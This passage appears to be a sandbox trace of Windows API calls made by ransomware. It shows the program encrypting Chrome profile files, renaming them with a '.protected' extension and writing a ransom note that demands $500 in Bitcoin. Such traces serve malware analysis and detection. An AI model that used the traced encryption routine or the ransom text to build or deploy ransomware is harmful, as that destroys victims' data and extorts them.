service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.409] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, 
lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0078.410] lstrlenA (lpString="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") returned 684 [0078.410] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0078.410] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.410] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0078.410] CloseHandle (hObject=0x154) returned 1 [0078.410] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0078.410] lstrcmpiW (lpString1="Cookies", lpString2="Windows") returned -1 [0078.410] lstrcmpiW (lpString1="Cookies", lpString2="Program Files") returned -1 [0078.410] lstrcmpiW (lpString1="Cookies", lpString2="Program Files (x86)") returned -1 [0078.410] lstrcmpiW (lpString1="Cookies", lpString2="$Recycle.bin") returned 1 [0078.410] lstrcmpiW (lpString1="Cookies", lpString2="System Volume Information") returned -1 [0078.410] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies") returned 87 [0078.410] StrStrIW (lpFirst="Cookies", lpSrch=".protected") returned 0x0 [0078.410] lstrcmpW (lpString1="Cookies", lpString2="RESTORE_FILES.txt") returned -1 [0078.410] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: 
pbBuffer=0x295e4fc) returned 1 [0078.410] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0078.410] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cookies"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0078.411] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies") returned 87 [0078.411] StrStrW (lpFirst="Cookies", lpSrch=".txt") returned 0x0 [0078.411] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies") returned 87 [0078.411] StrStrW (lpFirst="Cookies", lpSrch=".rar") returned 0x0 [0078.411] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies") returned 87 [0078.411] StrStrW (lpFirst="Cookies", lpSrch=".zip") returned 0x0 [0078.411] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x1c00, lpOverlapped=0x0) returned 1 [0078.413] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffe400, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.413] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1c00, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x1c00, lpOverlapped=0x0) returned 1 [0078.414] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.414] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0078.414] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0078.414] CloseHandle (hObject=0x154) returned 1 [0078.415] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies.protected") returned 97 [0078.415] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cookies"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cookies.protected")) returned 1 [0078.415] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0078.415] lstrcmpiW (lpString1="Cookies-journal", lpString2="Windows") returned -1 [0078.415] lstrcmpiW (lpString1="Cookies-journal", lpString2="Program Files") returned -1 [0078.415] lstrcmpiW (lpString1="Cookies-journal", lpString2="Program Files (x86)") returned -1 [0078.415] lstrcmpiW (lpString1="Cookies-journal", lpString2="$Recycle.bin") returned 1 [0078.415] lstrcmpiW (lpString1="Cookies-journal", lpString2="System Volume Information") returned -1 [0078.415] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies-journal") returned 95 [0078.416] StrStrIW (lpFirst="Cookies-journal", lpSrch=".protected") returned 0x0 [0078.416] lstrcmpW (lpString1="Cookies-journal", lpString2="RESTORE_FILES.txt") returned -1 [0078.416] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0078.416] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0078.416] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cookies-journal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0078.416] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies-journal") returned 95 [0078.416] StrStrW (lpFirst="Cookies-journal", lpSrch=".txt") returned 0x0 [0078.416] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies-journal") returned 95 [0078.416] StrStrW (lpFirst="Cookies-journal", lpSrch=".rar") returned 0x0 [0078.416] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies-journal") returned 95 [0078.416] StrStrW (lpFirst="Cookies-journal", lpSrch=".zip") returned 0x0 [0078.416] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0078.416] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, 
lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.416] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0078.417] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.417] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0078.418] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0078.418] CloseHandle (hObject=0x154) returned 1 [0078.419] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies-journal.protected") returned 105 [0078.419] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cookies-journal"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies-journal.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cookies-journal.protected")) returned 1 [0078.419] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0078.419] lstrcmpiW (lpString1="Current Session", lpString2="Windows") returned -1 [0078.419] lstrcmpiW (lpString1="Current Session", 
lpString2="Program Files") returned -1 [0078.419] lstrcmpiW (lpString1="Current Session", lpString2="Program Files (x86)") returned -1 [0078.419] lstrcmpiW (lpString1="Current Session", lpString2="$Recycle.bin") returned 1 [0078.419] lstrcmpiW (lpString1="Current Session", lpString2="System Volume Information") returned -1 [0078.419] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Session") returned 95 [0078.419] StrStrIW (lpFirst="Current Session", lpSrch=".protected") returned 0x0 [0078.419] lstrcmpW (lpString1="Current Session", lpString2="RESTORE_FILES.txt") returned -1 [0078.419] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0078.420] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0078.420] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Session" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\current session"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0078.420] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Session") returned 95 [0078.420] StrStrW (lpFirst="Current Session", lpSrch=".txt") returned 0x0 [0078.420] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Session") returned 95 [0078.420] StrStrW (lpFirst="Current Session", lpSrch=".rar") returned 0x0 [0078.420] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Session") returned 95 [0078.421] StrStrW (lpFirst="Current Session", lpSrch=".zip") returned 0x0 [0078.421] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x1d6, lpOverlapped=0x0) returned 1 [0078.421] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffffe2a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.422] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1d6, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x1d6, lpOverlapped=0x0) returned 1 [0078.422] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.422] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0078.422] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0078.423] CloseHandle (hObject=0x154) returned 1 [0078.423] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Session.protected") returned 105 [0078.423] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Session" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\current session"), 
lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Session.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\current session.protected")) returned 1 [0078.424] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0078.424] lstrcmpiW (lpString1="Current Tabs", lpString2="Windows") returned -1 [0078.424] lstrcmpiW (lpString1="Current Tabs", lpString2="Program Files") returned -1 [0078.424] lstrcmpiW (lpString1="Current Tabs", lpString2="Program Files (x86)") returned -1 [0078.424] lstrcmpiW (lpString1="Current Tabs", lpString2="$Recycle.bin") returned 1 [0078.424] lstrcmpiW (lpString1="Current Tabs", lpString2="System Volume Information") returned -1 [0078.424] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Tabs") returned 92 [0078.424] StrStrIW (lpFirst="Current Tabs", lpSrch=".protected") returned 0x0 [0078.424] lstrcmpW (lpString1="Current Tabs", lpString2="RESTORE_FILES.txt") returned -1 [0078.424] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0078.424] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0078.424] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Tabs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\current tabs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0078.424] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Tabs") returned 92 [0078.424] StrStrW (lpFirst="Current Tabs", lpSrch=".txt") returned 0x0 [0078.425] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Tabs") returned 92 [0078.425] StrStrW (lpFirst="Current Tabs", lpSrch=".rar") returned 0x0 [0078.425] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Tabs") returned 92 [0078.425] StrStrW (lpFirst="Current Tabs", lpSrch=".zip") returned 0x0 [0078.425] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x126, lpOverlapped=0x0) returned 1 [0078.426] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffffeda, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.426] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x126, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x126, lpOverlapped=0x0) returned 1 [0078.426] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.426] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0078.426] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0078.427] CloseHandle (hObject=0x154) returned 1 [0078.427] wnsprintfW (in: pszDest=0x4bfb20, 
cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Tabs.protected") returned 102 [0078.427] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Tabs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\current tabs"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Tabs.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\current tabs.protected")) returned 1 [0078.429] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0078.429] lstrcmpiW (lpString1="data_reduction_proxy_leveldb", lpString2="Windows") returned -1 [0078.429] lstrcmpiW (lpString1="data_reduction_proxy_leveldb", lpString2="Program Files") returned -1 [0078.429] lstrcmpiW (lpString1="data_reduction_proxy_leveldb", lpString2="Program Files (x86)") returned -1 [0078.429] lstrcmpiW (lpString1="data_reduction_proxy_leveldb", lpString2="$Recycle.bin") returned 1 [0078.429] lstrcmpiW (lpString1="data_reduction_proxy_leveldb", lpString2="System Volume Information") returned -1 [0078.429] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned 108 [0078.429] lstrcmpW (lpString1="data_reduction_proxy_leveldb", lpString2=".") returned 1 [0078.429] lstrcmpW (lpString1="data_reduction_proxy_leveldb", lpString2="..") returned 1 [0078.429] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\*") returned 110 [0078.429] 
FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0078.455] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.455] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.455] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.455] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.455] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.455] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\.") returned 110 [0078.455] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.455] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.455] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.455] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.455] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.455] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.455] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.455] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\..") returned 111 [0078.455] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.455] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.455] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.455] lstrcmpiW (lpString1="000003.log", lpString2="Windows") returned -1 [0078.455] 
lstrcmpiW (lpString1="000003.log", lpString2="Program Files") returned -1 [0078.455] lstrcmpiW (lpString1="000003.log", lpString2="Program Files (x86)") returned -1 [0078.455] lstrcmpiW (lpString1="000003.log", lpString2="$Recycle.bin") returned 1 [0078.455] lstrcmpiW (lpString1="000003.log", lpString2="System Volume Information") returned -1 [0078.455] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log") returned 119 [0078.455] StrStrIW (lpFirst="000003.log", lpSrch=".protected") returned 0x0 [0078.455] lstrcmpW (lpString1="000003.log", lpString2="RESTORE_FILES.txt") returned -1 [0078.455] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.455] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.455] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\000003.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.456] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log") returned 119 [0078.456] StrStrW (lpFirst="000003.log", lpSrch=".txt") returned 0x0 [0078.456] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log") returned 119 [0078.456] StrStrW 
(lpFirst="000003.log", lpSrch=".rar") returned 0x0 [0078.456] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log") returned 119 [0078.456] StrStrW (lpFirst="000003.log", lpSrch=".zip") returned 0x0 [0078.456] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x0, lpOverlapped=0x0) returned 1 [0078.456] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.456] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x0, lpOverlapped=0x0) returned 1 [0078.456] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.456] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.457] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.457] CloseHandle (hObject=0x158) returned 1 [0078.457] 